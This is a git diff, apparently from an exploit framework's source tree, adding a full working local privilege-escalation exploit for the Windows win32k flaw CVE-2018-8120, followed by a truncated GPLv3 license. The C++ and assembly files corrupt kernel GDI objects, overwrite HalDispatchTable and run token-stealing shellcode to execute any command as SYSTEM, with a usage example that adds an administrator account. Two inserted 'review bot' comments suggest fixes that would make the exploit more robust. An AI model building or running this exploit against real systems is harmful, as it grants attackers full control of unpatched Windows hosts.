h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + + + Source Files + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp new file mode 100755 index 0000000000..06edb885be --- /dev/null 
+++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp 
@@ -0,0 +1,667 @@ +#define PSAPI_VERSION 1 +#include +#include +#include +#include +//#pragma comment(lib,"ntdll.lib") +#pragma comment(lib, "Psapi.lib") + + + +#ifndef _WIN64 +typedef +NTSYSAPI +NTSTATUS +(NTAPI *_NtAllocateVirtualMemory)( +IN HANDLE ProcessHandle, +IN OUT PVOID *BaseAddress, +IN ULONG ZeroBits, +IN OUT PULONG RegionSize, +IN ULONG AllocationType, +IN ULONG Protect); + +struct tagIMEINFO32 +{ + unsigned int dwPrivateDataSize; + unsigned int fdwProperty; + unsigned int fdwConversionCaps; + unsigned int fdwSentenceCaps; + unsigned int fdwUICaps; + unsigned int fdwSCSCaps; + unsigned int fdwSelectCaps; +}; + +typedef struct tagIMEINFOEX +{ + HKL__ *hkl; + tagIMEINFO32 ImeInfo; + wchar_t wszUIClass[16]; + unsigned int fdwInitConvMode; + int fInitOpen; + int fLoadFlag; + unsigned int dwProdVersion; + unsigned int dwImeWinVersion; + wchar_t wszImeDescription[50]; + wchar_t wszImeFile[80]; + __int32 fSysWow64Only : 1; + __int32 fCUASLayer : 1; +}IMEINFOEX, *PIMEINFOEX; + +struct _HEAD +{ + void *h; + unsigned int cLockObj; +}; + +struct tagKBDFILE +{ + _HEAD head; + tagKBDFILE *pkfNext; + void *hBase; + void *pKbdTbl; + unsigned int Size; + void *pKbdNlsTbl; + wchar_t awchDllName[32]; +}; + +typedef struct _tagKL +{ + _HEAD head; + _tagKL *pklNext; + _tagKL *pklPrev; + unsigned int dwKL_Flags; + HKL__ *hkl; + tagKBDFILE *spkf; + tagKBDFILE *spkfPrimary; + unsigned int dwFontSigs; + unsigned int iBaseCharset; + unsigned __int16 CodePage; + wchar_t wchDiacritic; + tagIMEINFOEX *piiex; + unsigned int uNumTbl; + tagKBDFILE **pspkfExtra; + unsigned int dwLastKbdType; + unsigned int dwLastKbdSubType; + unsigned int dwKLID; +}tagKL, *P_tagKL; +DWORD gSyscall = 0; + +__declspec(naked) void NtUserSetImeInfoEx(PVOID tmp) +{ + _asm + { + + mov esi, tmp; + mov eax, gSyscall; + mov edx, 0x7FFE0300; + call dword ptr[edx]; + ret 4; + } +} +#else +extern "C" void NtUserSetImeInfoEx(PVOID); +typedef +NTSYSAPI +NTSTATUS +(NTAPI *_NtAllocateVirtualMemory)( +IN HANDLE 
ProcessHandle, +IN OUT PVOID *BaseAddress, +IN ULONG ZeroBits, +IN OUT PULONG64 RegionSize, +IN ULONG AllocationType, +IN ULONG Protect); +#endif + +typedef struct +{ + LPVOID pKernelAddress; + USHORT wProcessId; + USHORT wCount; + USHORT wUpper; + USHORT wType; + LPVOID pUserAddress; +} GDICELL; +typedef NTSTATUS(__stdcall*RtlGetVersionT)(PRTL_OSVERSIONINFOW lpVersionInformation); + +typedef BOOL(WINAPI *LPFN_GLPI)( + PSYSTEM_LOGICAL_PROCESSOR_INFORMATION, + PDWORD); + +typedef NTSTATUS(WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, + OUT PULONG Interval); + +NtQueryIntervalProfile_t NtQueryIntervalProfile; + + +DWORD gTableOffset = 0; +HANDLE gManger, gWorker; + +#ifdef _WIN64 +ULONG64 gtable; +#else +DWORD gtable; +#endif + +#ifdef _WIN64 +ULONG64 getpeb() +{ +#else +DWORD getpeb() +{ +#endif +#ifdef _WIN64 + ULONG64 p = (ULONG64)__readgsqword(0x30); + p = *(ULONG64*)(p + 0x60); +#else + DWORD p = (DWORD)__readfsdword(0x18); + p = *(DWORD*)((char*)p + 0x30); +#endif + return p; +} +#ifdef _WIN64 +ULONG64 getgdi() +{ +#else +DWORD getgdi() +{ +#endif +#ifdef _WIN64 + return *(ULONG64*)(getpeb() + gTableOffset); +#else + return *(DWORD*)(getpeb() + gTableOffset); +#endif + +} +PVOID getpvscan0(HANDLE h) +{ + if (!gtable) + gtable = getgdi(); +#ifdef _WIN64 + ULONG64 p = gtable + LOWORD(h) * sizeof(GDICELL); + GDICELL *c = (GDICELL*)p; + return (char*)c->pKernelAddress + 0x50; +#else + DWORD p = (gtable + LOWORD(h) * sizeof(GDICELL)) & 0x00000000ffffffff; + GDICELL *c = (GDICELL*)p; + return (char*)c->pKernelAddress + 0x30; +#endif +} + + +#ifdef _WIN64 +typedef unsigned __int64 QWORD, *PQWORD; +typedef QWORD DT; +#else +typedef DWORD DT; +#endif + +extern "C" DT g_EPROCESS_TokenOffset = 0, g_EPROCESS = 0, g_flink = 0, g_kthread = 0, g_PID = 0; +#ifdef _WIN64 +extern "C" void shellcode08(void); +extern "C" void shellcode7(void); +#else + +__declspec(noinline) int shellcode() +{ + __asm { + pushad;// save registers state + mov edx, g_kthread; + mov eax, 
fs:[edx];// Get nt!_KPCR.PcrbData.CurrentThread + mov edx, g_EPROCESS; + mov eax, [eax + edx];// Get nt!_KTHREAD.ApcState.Process + mov ecx, eax;// Copy current _EPROCESS structure + mov esi, g_EPROCESS_TokenOffset; + mov edx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4 + mov edi, g_flink; + mov ebx, g_PID; + SearchSystemPID: + mov eax, [eax + edi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink + sub eax, edi; + cmp[eax + ebx], edx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID; + + mov edx, [eax + esi];// Get SYSTEM process nt!_EPROCESS.Token + mov[ecx + esi], edx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + popad;// restore registers state + + // recovery + xor eax, eax;// Set NTSTATUS SUCCEESS + + } +} +#endif +DWORD GetCpuNumber() +{ + LPFN_GLPI glpi; + BOOL done = FALSE; + PSYSTEM_LOGICAL_PROCESSOR_INFORMATION buffer = NULL; + PSYSTEM_LOGICAL_PROCESSOR_INFORMATION ptr = NULL; + DWORD returnLength = 0; + DWORD logicalProcessorCount = 0; + DWORD numaNodeCount = 0; + DWORD processorPackageCount = 0; + DWORD byteOffset = 0; + + glpi = (LPFN_GLPI)GetProcAddress( + GetModuleHandle(TEXT("kernel32")), + "GetLogicalProcessorInformation"); + if (NULL == glpi) + { + puts("[-] GetLogicalProcessorInformation is not supported."); + return (1); + } + + while (!done) + { + DWORD rc = glpi(buffer, &returnLength); + + if (FALSE == rc) + { + if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) + { + if (buffer) + free(buffer); + + buffer = (PSYSTEM_LOGICAL_PROCESSOR_INFORMATION)malloc( + returnLength); + + if (NULL == buffer) + { + puts("[-] Error: Allocation failure"); + return (1); + } + } + else + { + printf("[-] Error %d\n", GetLastError()); + return 1; + } + } + else + { + done = TRUE; + } + } + + ptr = buffer; + + while (byteOffset + sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION) <= returnLength) + { + switch (ptr->Relationship) + { + + case RelationProcessorPackage: + // Logical processors share a physical package. 
+ processorPackageCount++; + + default: + break; + } + byteOffset += sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); + ptr++; + } + + return processorPackageCount; +} +// detect extract kernel images. +char* DetectKernel(PDWORD offset) +{ + BOOL pae = FALSE; + *offset = 0; + int tmp[4]; + RtlSecureZeroMemory(tmp, sizeof(tmp)); + __cpuid(tmp, 1); + + if (tmp[3]&0x40) + { + pae = TRUE; + } + + if (GetCpuNumber()>1) + { +#ifndef _WIN64 + if (pae) + { + *offset = 0x9000; + return "ntkrpamp.exe"; + } + else +#endif + { + return "ntkrnlmp.exe"; + } + } + else + { +#ifndef _WIN64 + + if (pae) + { + *offset = 0x9000; + return "ntkrnlpa.exe"; + } + else +#endif + { + return "ntoskrnl.exe"; + } + } +} + +PVOID leakHal() +{ + DT ntoskrnlBase; + DT HalDTUser, HalDTOffset; + HMODULE userKernel; + char * FuncAddress = 0L; + + LPVOID drivers[1024]; + DWORD cbNeeded; + + if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) + { + if (drivers[0]) + { + ntoskrnlBase = (DT)drivers[0]; + } + } + else + { + printf("[-] EnumDeviceDrivers failed; array size needed is %d\n", cbNeeded / sizeof(LPVOID)); + } + // ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase; + DWORD offset = 0; + bool failback = false; + char *kernel = DetectKernel(&offset); + printf("[+] Detected kernel %s\n", kernel); + userKernel = LoadLibraryExA(kernel, NULL, DONT_RESOLVE_DLL_REFERENCES); + if (userKernel == NULL) + { + printf("[-] Could not load %s , load ntoskrnl.exe instead.\n",kernel); + userKernel = LoadLibraryExA("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES); + failback = true; + if (userKernel == NULL) + { + puts("[-] Could not load ntoskrnl.exe"); + return FALSE; + } + } + + HalDTUser = (DT)GetProcAddress(userKernel, "HalDispatchTable"); + HalDTOffset = HalDTUser - (DT)userKernel; + + if (failback) + { + return (PVOID)(ntoskrnlBase + HalDTOffset + offset); + } + else + { + return (PVOID)(ntoskrnlBase + HalDTOffset); + } +} +void main() +{ + int argc = 0; + 
wchar_t **argv = CommandLineToArgvW(GetCommandLineW(), &argc); + puts("CVE-2018-8120 exploit by @unamer(https://github.com/unamer)"); + fflush(stdout); + if (argc != 2) + { + puts("Usage: exp.exe command\nExample: exp.exe \"net user admin admin /ad\""); + fflush(stdout); + ExitProcess(0); + } + + HMODULE hntdll = GetModuleHandle(L"ntdll"); + PVOID overwrite_address; + int overwrite_offset; + ULONG Interval = 0; + PVOID sc=0; + + OSVERSIONINFOW osver; + RtlSecureZeroMemory(&osver, sizeof(osver)); + osver.dwOSVersionInfoSize = sizeof(osver); + RtlGetVersionT pRtlGetVersion = (RtlGetVersionT)GetProcAddress(hntdll, "RtlGetVersion"); + pRtlGetVersion(&osver); + if (osver.dwMajorVersion == 5) { +#ifdef _WIN64 + g_EPROCESS_TokenOffset = 0x160; + g_EPROCESS = 0x68; + g_flink = 0xe0; + g_PID = 0xd8; + g_kthread = 0x188; +#else + g_EPROCESS_TokenOffset = 0xd8; + g_EPROCESS = 0x38; + g_flink = 0x098; + g_PID = 0x94; + g_kthread = 0x124; +#endif + } + else if (osver.dwMajorVersion == 6) { +#ifdef _WIN64 + gTableOffset = 0x0f8; + if (osver.dwMinorVersion == 0)//win2008 + { + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x8; // QueryIntervalProfile + sc = &shellcode08; + g_EPROCESS_TokenOffset = 0x168; + g_EPROCESS = 0x68; + g_flink = 0xe0; + g_PID = 0xe8; + g_kthread = 0x188; + } + else + {//win7 + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x8; // QueryIntervalProfile + sc = &shellcode7; + g_EPROCESS_TokenOffset = 0x208; + g_EPROCESS = 0x70; + g_flink = 0x188; + g_PID = 0x180; + g_kthread = 0x188; + } + +#else + gTableOffset = 0x094; + if (osver.dwMinorVersion == 0)//win2008 + { + overwrite_address = (char*)leakHal(); // HalDispatchTable + overwrite_offset = 0x4; // QueryIntervalProfile + gSyscall = 0x121b; + g_EPROCESS_TokenOffset = 0xe0; + g_EPROCESS = 0x48; + g_flink = 0xa0; + g_PID = 0x9c; + g_kthread = 0x124; + } + else + {//win7 + overwrite_address = (char*)leakHal(); // HalDispatchTable + 
overwrite_offset = 0x4; // QueryIntervalProfile + gSyscall = 0x1226; + g_EPROCESS_TokenOffset = 0xf8; + g_EPROCESS = 0x50; + g_flink = 0xb8; + g_PID = 0xb4; + g_kthread = 0x124; + } +#endif + } + else + { + printf("[-] Not supported version %d\n", osver.dwBuildNumber); + ExitProcess(-1); + } + + + + _NtAllocateVirtualMemory NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress((HMODULE)hntdll,"NtAllocateVirtualMemory"); + + PVOID addr = (PVOID)0x100; + DT size = 0x1000; + + + if (!NtAllocateVirtualMemory) { + printf("[-] Fail to resolve NtAllocateVirtualMemory(0x%X)\n", GetLastError()); + fflush(stdout); + ExitProcess(1); + } + + if (NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) + { + puts("[-] Fail to alloc null page!"); + fflush(stdout); + ExitProcess(2); + } + + HWINSTA hSta = CreateWindowStationW(0, 0, READ_CONTROL, 0); + + if (!hSta) + { + printf("[-] CreateWindowStationW fail(0x%X)\n", GetLastError()); + fflush(stdout); + ExitProcess(3); + } + + if (!SetProcessWindowStation(hSta)) + { + printf("[-] SetProcessWindowStation fail(0x%X)\n", GetLastError()); + fflush(stdout); + ExitProcess(4); + } + unsigned int bbuf[0x60] = {0x90}; + //RtlSecureZeroMemory(bbuf, 0x60); + HANDLE gManger = CreateBitmap(0x60, 1, 1, 32, bbuf); + HANDLE gWorker = CreateBitmap(0x60, 1, 1, 32, bbuf); + + PVOID mpv = getpvscan0(gManger); + PVOID wpv = getpvscan0(gWorker); + +#ifndef _WIN64 + printf("[+] Get manager at %lx,worker at %lx\n", mpv, wpv); + P_tagKL pkl = 0; + pkl->hkl = (HKL__ *)wpv; + pkl->piiex = (tagIMEINFOEX *)((char*)mpv - sizeof(PVOID)); + + IMEINFOEX ime; + RtlSecureZeroMemory(&ime, sizeof(IMEINFOEX)); +#else + printf("[+] Get manager at %llx,worker at %llx\n", mpv, wpv); + char* pkl = 0; + *(DT*)(pkl + 0x28) = (DT)wpv; + *(DT*)(pkl + 0x50) = (DT)mpv - sizeof(PVOID); + + char ime[0x200]; + RtlSecureZeroMemory(&ime, 0x200); +#endif // _WIN32 + fflush(stdout); + // Initialize exploit parameters + + 
PVOID *p = (PVOID *)&ime; + p[0] = (PVOID)wpv; + p[1] = (PVOID)wpv; + DWORD *pp = (DWORD *)&p[2]; + pp[0] = 0x180; + pp[1] = 0xabcd; + pp[2] = 6; + pp[3] = 0x10000; +#ifndef _WIN64 + pp[5] = 0x4800200; +#else + pp[6] = 0x4800200; +#endif // _WIN32 + // trigger vuln + // bp win32k!SetImeInfoEx + // bp win32k!NtUserSetImeInfoEx + // modify the pvscan0 of manager! + + puts("[+] Triggering vulnerability..."); + fflush(stdout); + fflush(stderr); + NtUserSetImeInfoEx((PVOID)&ime); + + PVOID oaddr = ((char*)overwrite_address + overwrite_offset); +#ifndef _WIN64 + sc = &shellcode; + printf("[+] Overwriting...%lx\n", oaddr); +#else + printf("[+] Overwriting...%llx\n", oaddr); +#endif // _WIN32 + fflush(stdout); + + PVOID pOrg = 0; + + SetBitmapBits((HBITMAP)gManger, sizeof(PVOID), &oaddr); + GetBitmapBits((HBITMAP)gWorker, sizeof(PVOID), &pOrg); + SetBitmapBits((HBITMAP)gWorker, sizeof(PVOID), &sc); + + + NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hntdll, "NtQueryIntervalProfile"); + + if (!NtQueryIntervalProfile) { + fflush(stdout); + fflush(stderr); + printf("[-] Fail to resolve NtQueryIntervalProfile(0x%X)\n", GetLastError()); + ExitProcess(2); + } + puts("[+] Elevating privilege..."); + NtQueryIntervalProfile(0x1337, &Interval); + puts("[+] Cleaning up..."); + SetBitmapBits((HBITMAP)gWorker, sizeof(PVOID), &pOrg); + SECURITY_ATTRIBUTES sa; + HANDLE hRead, hWrite; + byte buf[40960] = { 0 }; + STARTUPINFOW si; + PROCESS_INFORMATION pi; + DWORD bytesRead; + RtlSecureZeroMemory(&si, sizeof(si)); + RtlSecureZeroMemory(&pi, sizeof(pi)); + RtlSecureZeroMemory(&sa, sizeof(sa)); + int br = 0; + sa.nLength = sizeof(SECURITY_ATTRIBUTES); + sa.lpSecurityDescriptor = NULL; + sa.bInheritHandle = TRUE; + if (!CreatePipe(&hRead, &hWrite, &sa, 0)) + { + fflush(stdout); + fflush(stderr); + ExitProcess(5); + } + wprintf(L"[+] Trying to execute %s as SYSTEM...\n", argv[1]); + si.cb = sizeof(STARTUPINFO); + GetStartupInfoW(&si); + si.hStdError = hWrite; + 
si.hStdOutput = hWrite; + si.wShowWindow = SW_HIDE; + si.lpDesktop = L"WinSta0\\Default"; + si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; + wchar_t cmd[4096] = { 0 }; + lstrcpyW(cmd, argv[1]); + if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) + { + fflush(stdout); + fflush(stderr); + CloseHandle(hWrite); + CloseHandle(hRead); + wprintf(L"[-] CreateProcessW failed![%p]\n", GetLastError()); + ExitProcess(6); + } + CloseHandle(hWrite); + printf("[+] Process created with pid %d!\n", pi.dwProcessId); + while (1) + { + if (!ReadFile(hRead, buf + br, 4000, &bytesRead, NULL)) + break; + br += bytesRead; + } + // HANDLE h = GetStdHandle(STD_OUTPUT_HANDLE); + // WriteConsoleA(h, buf, br, &bytesRead, 0); + puts((char*)buf); + fflush(stdout); + fflush(stderr); + CloseHandle(hRead); + CloseHandle(pi.hProcess); +} \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm new file mode 100755 index 0000000000..75a1c027d4 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/shellcode.asm 
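Review bot: The output-capture loop at the end of `main()` can write past `buf`, because `ReadFile(hRead, buf + br, 4000, &bytesRead, NULL)` repeats with no check of `br` against the 40960-byte array; a child that prints more than the array holds overruns the stack, and `puts((char*)buf)` then relies on a terminating NUL that a full buffer no longer has. Stop reading once less than one chunk of space remains, e.g. `if (br + 4000 >= (int)sizeof(buf)) break;` before the `ReadFile` call. The same pattern appears a few lines earlier, where `lstrcpyW(cmd, argv[1])` copies the argument into `wchar_t cmd[4096]` unbounded; `lstrcpynW(cmd, argv[1], ARRAYSIZE(cmd));` keeps the copy inside the array. `pRtlGetVersion` is also called without checking the `GetProcAddress` result, unlike the two later lookups in the same function.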
@@ -0,0 +1,70 @@ + +public shellcode08 +public shellcode7 +public shellcode03 +public NtUserSetImeInfoEx +_TEXT SEGMENT +NtUserSetImeInfoEx PROC + mov r10,rcx; + mov eax,4871; + syscall; + ret; +NtUserSetImeInfoEx ENDP + +shellcode08 PROC + mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread + mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process + mov rcx, rax;// Copy current _EPROCESS structure + mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4 + mov rdi, 232; + SearchSystemPID: + mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink + sub rax, rdi; + cmp [rax + 224], rdx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID + + mov rdx, [rax + 360];// Get SYSTEM process nt!_EPROCESS.Token + mov [rcx + 360], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + xor rax, rax;// Set NTSTATUS SUCCEESS + ret; +shellcode08 ENDP + +shellcode7 PROC + mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread + mov rax, [rax + 112];// Get nt!_KTHREAD.ApcState.Process + mov rcx, rax;// Copy current _EPROCESS structure + mov rdx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4 + mov rdi, 392; + SearchSystemPID: + mov rax, [rax + rdi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink + sub rax, rdi; + cmp [rax + 384], rdx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID + + mov rdx, [rax + 520];// Get SYSTEM process nt!_EPROCESS.Token + mov [rcx + 520], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + xor rax, rax;// Set NTSTATUS SUCCEESS + ret; +shellcode7 ENDP + +shellcode03 PROC + mov rax, gs:[392];// Get nt!_KPCR.PcrbData.CurrentThread + mov rax, [rax + 104];// Get nt!_KTHREAD.ApcState.Process + mov rcx, rax;// Copy current _EPROCESS structure + mov rdx, 4;// SYSTEM Process PID = 0x4 + mov rdi, 224;// Get nt!_EPROCESS.ActiveProcessLinks.Flink + SearchSystemPID: + mov rax, [rax + rdi]; + sub rax, rdi; + cmp [rax + 216], rdx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID + + mov rdx, [rax + 352];// Get SYSTEM process 
nt!_EPROCESS.Token + mov [rcx + 352], rdx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + xor rax, rax;// Set NTSTATUS SUCCEESS + ret; +shellcode03 ENDP + +_TEXT ENDS + +END \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/LICENSE b/external/source/exploits/CVE-2018-8120/LICENSE new file mode 100755 index 0000000000..94a9ed024d --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/LICENSE 
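Review bot: `shellcode03` is declared `public` and defined in this file, but Source.cpp in the same commit only declares and takes the address of `shellcode08` and `shellcode7`, so the routine looks like dead code; either drop it or add a comment saying why it is kept. The comments also need a pass: `shellcode08` carries `WIN 7 SP1 SYSTEM Process PID = 0x4`, apparently copied from the Windows 7 routine (the wording already used in `shellcode03`, `SYSTEM Process PID = 0x4`, fits all three), and `SUCCEESS` is misspelled on each `xor rax, rax` line. The structure offsets are written in decimal here and in hex in Source.cpp, which makes the two files hard to compare in review; using one notation in both would help.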
@@ -0,0 +1,674 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. 
+ + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. 
+ + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. 
+ + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. 
Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. 
+ + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. 
This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
